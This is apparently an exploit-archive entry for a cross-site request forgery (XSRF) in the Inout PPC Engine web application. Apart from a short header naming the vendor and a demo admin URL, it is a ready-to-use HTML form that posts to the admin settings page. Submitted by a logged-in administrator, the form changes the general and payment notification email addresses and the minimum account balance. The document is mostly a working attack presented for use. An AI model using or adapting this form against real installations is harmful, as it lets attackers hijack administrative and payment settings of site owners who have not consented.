# Exploit Title: Inout PPC Engine XSRF (change e-mail address) # Author: Jonturk75 # Category:: webapps # Vendor of Software Link: http://www.inoutscripts.com/products/inout_ppc_engine/ # Demo site: http://www.inoutdemo.com/inout_ppc_engine/admin/ -------------------------- <form name="form1" method="post" action="ppc-setting-action.php" onSubmit="return check_value()"> <input type="text" value="mail@mail.com" size="30" id="admin_general_notification_email" name="admin_general_notification_email"/></td> <input type="text" value="mail@mail.com" size="30" id="admin_payment_notification_email" name="admin_payment_notification_email"/></td> <input type="text" value="20" size="5" id="minimum_acc_balance" name="minimum_acc_balance"/> Kc</td> <input type="submit" value="Update !" name="Submit"/> </form>